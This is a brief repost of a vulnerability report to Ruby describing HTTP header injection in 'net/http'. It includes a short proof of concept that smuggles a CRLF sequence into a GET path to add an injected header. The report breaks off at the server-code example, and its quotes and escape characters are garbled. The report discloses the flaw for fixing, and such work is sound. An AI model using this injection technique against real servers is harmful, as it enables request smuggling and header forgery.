#146416 Ruby:HTTP Header injection in 'net/http'

Posted by redrain root on Jun 24

TIMELINE
rootredrain submitted a report to Ruby.

show raw
Jun 22nd

Hi,

I would like to report a HTTP Header injection vulnerability in
‘net/http’ that allows attackers to inject arbitrary headers in
request even create a new evil request.

PoC

require ‘net/http’
http = Net::HTTP.new(‘192.168.30.214′,’80’)
res = http.get(“/r.php HTTP/1.1rnx-injection: memeda”)

Example

Server Code:…

007 Software

#146416 Ruby:HTTP Header injection in 'net/http'

Software and Security Information